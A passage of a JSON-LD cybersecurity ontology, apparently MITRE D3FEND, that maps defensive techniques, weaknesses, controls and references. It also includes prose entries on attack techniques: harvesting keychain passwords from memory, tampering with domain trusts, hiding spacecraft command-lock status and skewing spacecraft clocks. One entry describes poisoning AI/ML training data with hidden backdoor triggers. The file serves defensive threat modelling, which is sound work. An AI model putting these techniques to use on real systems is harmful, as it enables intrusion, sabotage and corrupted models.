          "@id": "d3f:DigitalInformationBearer"
        },
        {
          "@id": "_:N6d40398ab777478abf8adda548dfab4c"
        }
      ]
    },
    {
      "@id": "_:N6d40398ab777478abf8adda548dfab4c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:copy-of"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CallStack"
      }
    },
    {
      "@id": "d3f:T1167",
      "@type": "owl:Class",
      "d3f:attack-id": "T1167",
      "d3f:definition": "In OS X prior to El Capitan, users with root access can read plaintext keychain passwords of logged-in users because Apple’s keychain implementation allows these credentials to be cached so that users are not repeatedly prompted for passwords. (Citation: OS X Keychain) (Citation: External to DA, the OS X Way) Apple’s securityd utility takes the user’s logon password, encrypts it with PBKDF2, and stores this master key in memory. Apple also uses a set of keys and algorithms to encrypt the user’s password, but once the master key is found, an attacker need only iterate over the other values to unlock the final password. (Citation: OS X Keychain)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1555.002",
      "rdfs:label": "Securityd Memory",
      "rdfs:seeAlso": {
        "@id": "d3f:T1555.002"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:CredentialAccessTechnique"
      }
    },
    {
      "@id": "d3f:HTTPPutEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where the HTTP PUT method is used to replace all current representations of the target resource with the request payload.",
      "rdfs:label": "HTTP PUT Event",
      "rdfs:subClassOf": {
        "@id": "d3f:HTTPRequestEvent"
      }
    },
    {
      "@id": "d3f:StandaloneHoneynet",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:StandaloneHoneynet"
      ],
      "d3f:d3fend-id": "D3-SHN",
      "d3f:definition": "An environment created for the purpose of attracting attackers and eliciting their behaviors that is not connected to any production enterprise systems.",
      "d3f:kb-article": "## How it works\nA standalone honeynet does not directly interact with the real enterprise environment. It may be located near or in some portion of the enterprise address space, but it does not interact with enterprise resources.\n\n## Considerations\nA standalone honeynet is a lower risk to deploy compared to connected or integrated honeynets due to its isolation from the enterprise network. However, this comes at the cost of fidelity and realism. Significant extra effort must be made in order to make the environment look realistic.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-DynamicSelectionAndGenerationOfAVirtualCloneForDetonationOfSuspiciousContentWithinAHoneyNetwork_PaloAltoNetworksInc"
      },
      "d3f:spoofs": {
        "@id": "d3f:IntranetNetwork"
      },
      "rdfs:label": "Standalone Honeynet",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DecoyEnvironment"
        },
        {
          "@id": "_:Nab82330b40fa4890acdf4bf845fd56d9"
        }
      ]
    },
    {
      "@id": "_:Nab82330b40fa4890acdf4bf845fd56d9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:spoofs"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:IntranetNetwork"
      }
    },
    {
      "@id": "d3f:HierarchicalDomainDenylisting",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:HierarchicalDomainDenylisting"
      ],
      "d3f:d3fend-id": "D3-HDDL",
      "d3f:definition": "Blocking the resolution of any subdomain of a specified domain name.",
      "d3f:kb-article": "## How it works\nThis technique is used to block DNS queries from related domains and subdomains that are unauthorized.\n\nHierarchical domain blacklisting considers the blacklisting of second level domains and additional sub-domains and specific hosts for a given query value. A denylist is maintained that contains DNS names and corresponding subdomains, including wildcards, that should be blocked for a given lookup.\n\n## Considerations\n* The denylist of domain names will have to be maintained and kept up to date.\n* Other domains that resolve to the domain of interest for blocking (CNAME, etc.) should also be considered.\n* Denylists should have identified maintenance cycles to ensure lists are not stale.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-UseDNSPolicyForApplyingFiltersOnDNSQueries"
      },
      "d3f:synonym": "Hierarchical Domain Blacklisting",
      "rdfs:label": "Hierarchical Domain Denylisting",
      "rdfs:subClassOf": {
        "@id": "d3f:ForwardResolutionDomainDenylisting"
      }
    },
    {
      "@id": "d3f:FileEncryption",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:FileEncryption"
      ],
      "d3f:d3fend-id": "D3-FE",
      "d3f:definition": "Encrypting a file using a cryptographic key.",
      "d3f:encrypts": {
        "@id": "d3f:File"
      },
      "d3f:kb-article": "## How it Works\nFiles are encrypted using either a single key for both encryption and decryption or separate keys. Single key encryption is symmetric encryption and using two distinct keys is asymmetric encryption.\n\n### Symmetric Cryptography\nSymmetric encryption uses the same cryptographic key for both the encryption and decryption of a file. Managing keys at scale sometimes uses asymmetric key exchange. Protocols such as RSA or Diffie-Hellman can be used to share the symmetric cryptographic key with others.\n\n### Asymmetric Cryptography\nAsymmetric encryption is typically accomplished using public and private key certificates based on the X.509 standard. Files are encrypted using the public key and decrypted using the corresponding private key. Asymmetric encryption is typically slower than symmetric encryption and not widely used for large file encryption, but is popular for key wrapping, key exchanges, and digital signatures.\n\n## Considerations\n- Continuous monitoring must be carried out to ensure private keys are not compromised and the certificate authority (CA) is trusted.\n- Transfer of private keys between multiple devices must be performed securely.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-FileEncryption101SafeguardingYourSensitiveData"
        },
        {
          "@id": "d3f:Reference-GuideToStorageEncryptionTechnologiesForEndUserDevices"
        },
        {
          "@id": "d3f:Reference-SecurityConsiderationsForExchangingFilesOverTheInternet"
        }
      ],
      "rdfs:label": "File Encryption",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PlatformHardening"
        },
        {
          "@id": "_:N499ebd3a148d421fa20626318636fd97"
        }
      ]
    },
    {
      "@id": "_:N499ebd3a148d421fa20626318636fd97",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:encrypts"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "d3f:Reference-UEFIPlatformInitialization-Specification",
      "@type": [
        "owl:NamedIndividual",
        "d3f:SpecificationReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://uefi.org/sites/default/files/resources/PI_Spec_1_7_A_final_May1.pdf"
      },
      "d3f:kb-reference-of": {
        "@id": "d3f:BootloaderAuthentication"
      },
      "d3f:kb-reference-title": "UEFI Platform Initialization (PI) Specification",
      "rdfs:label": "Reference - UEFI Platform Initialization (PI) Specification"
    },
    {
      "@id": "d3f:DE-0003.05",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "DE-0003.05",
      "d3f:definition": "Receivers advertise acquisition states, bit lock, frame lock, and command lock, that indicate readiness to accept telecommands. Adversaries leverage these indicators in two ways: (1) use command-lock tests to validate geometry, power, Doppler, and polarization without risking visible command execution; and (2) tamper with the values that report lock status so ground views never show that lock was achieved. Techniques include freezing or clearing lock flags and counters, raising/lowering internal thresholds so lock occurs without being reported (or vice versa), and timing brief lock intervals between telemetry samples. The result is a window where the spacecraft is receptive to commands while downlinked status suggests otherwise.",
      "d3f:modifies": {
        "@id": "d3f:OperatingMode"
      },
      "rdfs:label": "Command Receiver Lock Modes - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/DE-0003/05/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DE-0003"
        },
        {
          "@id": "_:Ne158239764644545800a9cf06e5f114a"
        }
      ],
      "skos:prefLabel": "Command Receiver Lock Modes"
    },
    {
      "@id": "_:Ne158239764644545800a9cf06e5f114a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OperatingMode"
      }
    },
    {
      "@id": "d3f:EX-0012.13",
      "@type": "owl:Class",
      "d3f:attack-id": "EX-0012.13",
      "d3f:definition": "When missions employ AI/ML, for onboard detection/classification, compression, anomaly screening, guidance aids, or ground-side planning, training data becomes a control surface. Data poisoning inserts crafted examples or labels into the training corpus or fine-tuning set so the resulting model behaves incorrectly while appearing valid. Variants include clean-label backdoors (benign-looking samples with a hidden trigger that later induces a targeted response), label flipping and biased sampling (to skew decision boundaries), and corruption of calibration/ground-truth products that the pipeline trusts. For space systems, poisoning may occur in science archives, test vectors, simulated scenes, or housekeeping datasets used to train autonomy/anomaly models; models trained on poisoned corpora are then packaged and uplinked as routine updates. Once fielded, a simple trigger pattern in imagery, telemetry, or RF features can cause misclassification, suppression, or false positives at the time and place the adversary chooses, turning model behavior into an execution mechanism keyed by data rather than code.",
      "rdfs:label": "Poison AI/ML Training Data - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0012/13/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:EX-0012"
      },
      "skos:prefLabel": "Poison AI/ML Training Data"
    },
    {
      "@id": "d3f:display-order",
      "@type": "owl:AnnotationProperty",
      "d3f:definition": "x display-order y: An object x should be displayed in ordinal position y when placed or listed in a d3fend display with other objects of its kind.",
      "rdfs:label": "display-order",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-display-annotation"
      }
    },
    {
      "@id": "d3f:T1493",
      "@type": "owl:Class",
      "d3f:attack-id": "T1493",
      "d3f:definition": "Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, and decision making.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1565.002",
      "rdfs:label": "Transmitted Data Manipulation",
      "rdfs:seeAlso": {
        "@id": "d3f:T1565.002"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ImpactTechnique"
      }
    },
    {
      "@id": "d3f:Reference-SystemForImplementingThreatDetectionUsingDailyNetworkTrafficCommunityOutliers_VECTRANETWORKSInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20160191560A1"
      },
      "d3f:kb-abstract": "A method and system for identifying insider threats within an organization is provided. The approach constructs an internal connectivity graph to identify communities of hosts/users, and checks for abnormal behavior relative to past behaviors.",
      "d3f:kb-author": "David Lopes Pegna; Himanshu Mhatre; Oliver Brdiczka",
      "d3f:kb-mitre-analysis": "This patent describes techniques for detecting insider attacks. Network packet capture data is collected and stored for processing. Metadata is extracted for each communication session on the organization's network and includes information on source and destination host, destination port, number of connection attempts, size of data exchanged, duration and time of the communication. The metadata is used to build a connectivity graph of the network and identify groups of similar hosts that exhibit similar behavior. For each group of similar behavior identified, a baseline behavior pattern profile is developed. Network activity for a host within a group that deviates over a threshold from the baseline behavior patterns is identified as suspicious and an alert is generated.",
      "d3f:kb-organization": "VECTRA NETWORKS Inc",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:NetworkTrafficCommunityDeviation"
        },
        {
          "@id": "d3f:ProtocolMetadataAnomalyDetection"
        }
      ],
      "d3f:kb-reference-title": "System for implementing threat detection using daily network traffic community outliers",
      "rdfs:label": "Reference - System for implementing threat detection using daily network traffic community outliers - VECTRA NETWORKS Inc"
    },
    {
      "@id": "d3f:BusNetwork",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An electronic communication system that links multiple components through one shared transmission medium, together with the interface hardware and link-layer signalling that govern access to that medium.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Bus_(computing)"
      },
      "rdfs:label": "Bus Network",
      "rdfs:subClassOf": {
        "@id": "d3f:Network"
      },
      "skos:altLabel": [
        "Bus",
        "Data Highway"
      ]
    },
    {
      "@id": "d3f:T1043",
      "@type": "owl:Class",
      "d3f:attack-id": "T1043",
      "d3f:definition": "**This technique has been deprecated. Please use [Non-Standard Port](https://attack.mitre.org/techniques/T1571) where appropriate.**",
      "owl:deprecated": true,
      "rdfs:comment": "**This technique has been deprecated. Please use [Non-Standard Port](https://attack.mitre.org/techniques/T1571) where appropriate.**",
      "rdfs:label": "Commonly Used Port",
      "rdfs:subClassOf": {
        "@id": "d3f:CommandAndControlTechnique"
      }
    },
    {
      "@id": "d3f:T1597.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1597.001",
      "d3f:definition": "Adversaries may search private data from threat intelligence vendors for information that can be used during targeting. Threat intelligence vendors may offer paid feeds or portals that offer more data than what is publicly reported. Although sensitive details (such as customer names and other identifiers) may be redacted, this information may contain trends regarding breaches such as target industries, attribution claims, and successful TTPs/countermeasures.(Citation: D3Secutrity CTI Feeds)",
      "rdfs:label": "Threat Intel Vendors",
      "rdfs:subClassOf": {
        "@id": "d3f:T1597"
      }
    },
    {
      "@id": "d3f:SaveRegister",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:copies": {
        "@id": "d3f:ProcessorRegister"
      },
      "rdfs:label": "Save Registers",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemCall"
        },
        {
          "@id": "_:N592e53770828484bac6c08ffc788b878"
        }
      ]
    },
    {
      "@id": "_:N592e53770828484bac6c08ffc788b878",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:copies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ProcessorRegister"
      }
    },
    {
      "@id": "d3f:T1583.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1583.002",
      "d3f:definition": "Adversaries may set up their own Domain Name System (DNS) servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of hijacking existing DNS servers, adversaries may opt to configure and run their own DNS servers in support of operations.",
      "rdfs:label": "DNS Server",
      "rdfs:subClassOf": {
        "@id": "d3f:T1583"
      }
    },
    {
      "@id": "d3f:IntranetMulticastNetworkTraffic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Intranet multicast network traffic is multicast network traffic that does not cross a given network's boundaries.",
      "rdfs:label": "Intranet Multicast Network Traffic",
      "rdfs:seeAlso": {
        "@id": "dbr:Multicast"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:IntranetNetworkTraffic"
      }
    },
    {
      "@id": "d3f:CCI-001405_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system automatically audits account removal actions.",
      "d3f:exactly": {
        "@id": "d3f:DomainAccountMonitoring"
      },
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-24T00:00:00"
      },
      "rdfs:label": "CCI-001405"
    },
    {
      "@id": "d3f:CWE-665",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-665",
      "d3f:definition": "The product does not initialize or incorrectly initializes a resource, which might leave the resource in an unexpected state when it is accessed or used.",
      "rdfs:label": "Improper Initialization",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-664"
      }
    },
    {
      "@id": "d3f:ServiceEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event capturing the operation, configuration, or lifecycle of a service application. Services are specialized applications designed to provide reusable functionality to clients, systems, or other applications, often operating in the background or across networks.",
      "rdfs:label": "Service Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ApplicationEvent"
        },
        {
          "@id": "_:N90eec1df466e4a96917abf04f0a33317"
        }
      ]
    },
    {
      "@id": "_:N90eec1df466e4a96917abf04f0a33317",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ServiceApplication"
      }
    },
    {
      "@id": "d3f:T1484.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1484.002",
      "d3f:definition": "Adversaries may add new domain trusts, modify the properties of existing domain trusts, or otherwise change the configuration of trust relationships between domains and tenants to evade defenses and/or elevate privileges. Trust details, such as whether or not user identities are federated, allow authentication and authorization properties to apply between domains or tenants for the purpose of accessing shared resources.(Citation: Microsoft - Azure AD Federation) These trust objects may include accounts, credentials, and other authentication material applied to servers, tokens, and domains.",
      "rdfs:label": "Trust Modification",
      "rdfs:subClassOf": {
        "@id": "d3f:T1484"
      }
    },
    {
      "@id": "d3f:T1592.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1592.001",
      "d3f:definition": "Adversaries may gather information about the victim's host hardware that can be used during targeting. Information about hardware infrastructure may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: card/biometric readers, dedicated encryption hardware, etc.).",
      "rdfs:label": "Hardware",
      "rdfs:subClassOf": {
        "@id": "d3f:T1592"
      }
    },
    {
      "@id": "d3f:KernelModuleEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event involving the management of kernel modules, such as the loading or unloading of device drivers, extensions, or other dynamically linked components essential for kernel functionality.",
      "rdfs:label": "Kernel Module Event",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/classes/kernel_extension_activity"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:KernelEvent"
        },
        {
          "@id": "_:N9a15fdeafdb24a769822717f38f67c79"
        },
        {
          "@id": "_:N4368181659bb427c8e9aaee6d8abf202"
        }
      ]
    },
    {
      "@id": "_:N9a15fdeafdb24a769822717f38f67c79",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:HardwareDriver"
      }
    },
    {
      "@id": "_:N4368181659bb427c8e9aaee6d8abf202",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:KernelModule"
      }
    },
    {
      "@id": "d3f:Reference-QuickExecutionOfASeriesOfSuspiciousCommands_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2013-04-002/"
      },
      "d3f:kb-abstract": "Certain commands are frequently used by malicious actors and infrequently used by normal users. By looking for execution of these commands in short periods of time, we can not only see when a malicious user was on the system but also get an idea of what they were doing.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessLineageAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2013-04-002: Quick execution of a series of suspicious commands",
      "rdfs:label": "Reference - CAR-2013-04-002: Quick execution of a series of suspicious commands - MITRE"
    },
    {
      "@id": "d3f:Reference-SecurityArchitectureForTheInternetProtocol",
      "@type": [
        "owl:NamedIndividual",
        "d3f:SpecificationReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://datatracker.ietf.org/doc/html/rfc1825"
      },
      "d3f:kb-abstract": "This memo describes the security mechanisms for IP version 4 (IPv4)\n   and IP version 6 (IPv6) and the services that they provide.  Each\n   security mechanism is specified in a separate document.  This\n   document also describes key management requirements for systems\n   implementing those security mechanisms.  This document is not an\n   overall Security Architecture for the Internet and is instead focused\n   on IP-layer security.",
      "d3f:kb-author": "Randall Atkinson",
      "d3f:kb-reference-of": {
        "@id": "d3f:EncryptedTunnels"
      },
      "d3f:kb-reference-title": "Security Architecture for the Internet Protocol",
      "rdfs:label": "Reference - Security Architecture for the Internet Protocol"
    },
    {
      "@id": "d3f:Reference-CAR-2020-09-002%3AComponentObjectModelHijacking_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2020-09-002/"
      },
      "d3f:kb-abstract": "Adversaries may establish persistence or escalate privileges by executing malicious content triggered by hijacked references to Component Object Model (COM) objects. This is typically done by replacing COM object registry entries under the HKEY_CURRENT_USER\\Software\\Classes\\CLSID or HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID keys. Accordingly, this analytic looks for any changes under these keys.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:UserSessionInitConfigAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2020-09-002: Component Object Model Hijacking",
      "rdfs:label": "Reference - CAR-2020-09-002:  Component Object Model Hijacking - MITRE"
    },
    {
      "@id": "d3f:AlethicLogic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-AL",
      "d3f:definition": "Alethic logic is a modal logic that addresses the modalities of necessity and possibility.",
      "d3f:kb-article": "## References\n1. Alethic logic. (2023, June 4). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/Modal_logic#Alethic_logic)",
      "rdfs:label": "Alethic Logic",
      "rdfs:subClassOf": {
        "@id": "d3f:ModalLogic"
      }
    },
    {
      "@id": "d3f:accessed-by",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x accessed-by y: The entity or resource x is accessed by entity y.",
      "owl:inverseOf": {
        "@id": "d3f:accesses"
      },
      "rdfs:label": "accessed-by",
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:associated-with"
        },
        {
          "@id": "d3f:may-be-accessed-by"
        }
      ]
    },
    {
      "@id": "d3f:M1040",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseMitigation"
      ],
      "d3f:related": [
        {
          "@id": "d3f:AuthenticationEventThresholding"
        },
        {
          "@id": "d3f:AuthorizationEventThresholding"
        },
        {
          "@id": "d3f:JobFunctionAccessPatternAnalysis"
        },
        {
          "@id": "d3f:ResourceAccessPatternAnalysis"
        },
        {
          "@id": "d3f:SessionDurationAnalysis"
        },
        {
          "@id": "d3f:UserDataTransferAnalysis"
        },
        {
          "@id": "d3f:UserGeolocationLogonPatternAnalysis"
        },
        {
          "@id": "d3f:WebSessionActivityAnalysis"
        }
      ],
      "rdfs:label": "Behavior Prevention on Endpoint"
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_SI-3_4",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Malicious Code Protection | Updates Only by Privileged Users",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:LocalFilePermissions"
        },
        {
          "@id": "d3f:SystemConfigurationPermissions"
        }
      ],
      "rdfs:label": "SI-3(4)"
    },
    {
      "@id": "d3f:ATTACKMobileTechnique",
      "@type": "owl:Class",
      "rdfs:label": "ATTACK Mobile Technique",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileThing"
      }
    },
    {
      "@id": "d3f:NetworkMediaStreamingResource",
      "@type": "owl:Class",
      "d3f:definition": "A server that provides digital media content to users.",
      "rdfs:label": "Network Media Streaming Resource",
      "rdfs:subClassOf": {
        "@id": "d3f:NetworkResource"
      }
    },
    {
      "@id": "d3f:attack-kb-annotation",
      "@type": "owl:AnnotationProperty",
      "d3f:definition": "x attack-kb-annotation y: The offensive technique x has the kb annotation of y.",
      "rdfs:domain": {
        "@id": "d3f:OffensiveTechnique"
      },
      "rdfs:label": "attack-kb-annotation",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-annotation"
      }
    },
    {
      "@id": "_:N4c323b6223644773b5da53d09d7660ba",
      "@type": "owl:AllDisjointClasses",
      "owl:members": {
        "@list": [
          {
            "@id": "d3f:CoefficientOfVariation"
          },
          {
            "@id": "d3f:InterquartileRange"
          },
          {
            "@id": "d3f:MeanAbsoluteDeviation"
          },
          {
            "@id": "d3f:MedianAbsoluteDeviation"
          },
          {
            "@id": "d3f:Range"
          },
          {
            "@id": "d3f:StandardDeviation"
          },
          {
            "@id": "d3f:Variance"
          }
        ]
      }
    },
    {
      "@id": "d3f:TrustedLibrary",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3-TL",
      "d3f:definition": "A trusted library is a collection of pre-verified and secure code modules or components that are used within software applications to perform specific functions. These libraries are considered reliable and have been vetted for security vulnerabilities, ensuring they do not introduce risks into the application.",
      "d3f:hardens": {
        "@id": "d3f:Subroutine"
      },
      "d3f:kb-article": "## How it Works\nUsing a trusted library can reduce the chances of introducing errors compared to writing code from scratch.\n\n\n\n## Considerations\n\nNote: This resource should not be considered a definitive or exhaustive coding guideline.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-LeverageSecurityFrameworksLibraries_OWASP"
      },
      "rdfs:label": "Trusted Library",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SourceCodeHardening"
        },
        {
          "@id": "_:N1f2d311a2f3f462eb853531a26970aa9"
        }
      ]
    },
    {
      "@id": "_:N1f2d311a2f3f462eb853531a26970aa9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:hardens"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Subroutine"
      }
    },
    {
      "@id": "d3f:PassiveLogicalLinkMapping",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:PassiveLogicalLinkMapping"
      ],
      "d3f:d3fend-id": "D3-PLLM",
      "d3f:definition": "Passive logical link mapping only listens to network traffic as a means to map the the whole data link layer, where the links represent logical data flows rather than physical connections.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-TenablePassiveNetworkMonitoring"
      },
      "d3f:synonym": "Passive Logical Layer Mapping",
      "rdfs:label": "Passive Logical Link Mapping",
      "rdfs:subClassOf": {
        "@id": "d3f:LogicalLinkMapping"
      }
    },
    {
      "@id": "d3f:CWE-410",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-410",
      "d3f:definition": "The product's resource pool is not large enough to handle peak demand, which allows an attacker to prevent others from accessing the resource by using a (relatively) large number of requests for resources.",
      "rdfs:label": "Insufficient Resource Pool",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-664"
      }
    },
    {
      "@id": "d3f:UserAccountDeletionEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event representing the permanent deletion of a user account from a system or domain.",
      "rdfs:label": "User Account Deletion Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:UserAccountEvent"
        },
        {
          "@id": "_:Nfbbdf6702d144973a2e93ef73f666cc0"
        }
      ]
    },
    {
      "@id": "_:Nfbbdf6702d144973a2e93ef73f666cc0",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserAccountCreationEvent"
      }
    },
    {
      "@id": "d3f:has-operating-mode",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x has-operating-mode y: The entity x is currently operating in or has the potential to be in operating mode y.",
      "rdfs:label": "has-operating-mode",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:CWE-825",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:cwe-id": "CWE-825",
      "d3f:definition": "The product dereferences a pointer that contains a location for memory that was previously valid, but is no longer valid.",
      "d3f:synonym": "Dangling pointer",
      "d3f:weakness-of": {
        "@id": "d3f:UserInputFunction"
      },
      "rdfs:label": "Expired Pointer Dereference",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-119"
        },
        {
          "@id": "d3f:CWE-672"
        },
        {
          "@id": "_:N82a3ea11b300486db823890926c5773b"
        }
      ]
    },
    {
      "@id": "_:N82a3ea11b300486db823890926c5773b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:weakness-of"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserInputFunction"
      }
    },
    {
      "@id": "d3f:EX-0012.12",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "EX-0012.12",
      "d3f:definition": "Spacecraft maintain multiple time bases and distribute time to schedule sequences, validate timetags, manage anti-replay counters, and align navigation/attitude processing. By writing to clock registers, altering time-distribution services, switching disciplining sources, or biasing oscillator parameters, an adversary can skew these references. Effects include reordering or prematurely firing stored command sequences, invalidating timetag checks, desynchronizing counters used by authentication or ranging, misaligning estimator windows, and corrupting timestamped payload data. Even small offsets can accumulate into observable misbehavior when autonomy and scheduling depend on tight temporal guarantees. The result is execution that happens at the wrong moment, or not at all, because the system’s notion of “now” has been shifted.",
      "d3f:modifies": {
        "@id": "d3f:SystemTime"
      },
      "rdfs:label": "System Clock - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0012/12/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:EX-0012"
        },
        {
          "@id": "_:N5b52298636ba467e92781c8ed071e6d7"
        }
      ],
      "skos:prefLabel": "System Clock"
    },
    {
      "@id": "_:N5b52298636ba467e92781c8ed071e6d7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemTime"
      }
    },
    {
      "@id": "d3f:TA0107",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "rdfs:label": "Inhibit Response Function - ATTACK ICS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKICSTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ],
      "skos:prefLabel": "Inhibit Response Function"
    },
    {
      "@id": "d3f:OutputDevice",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
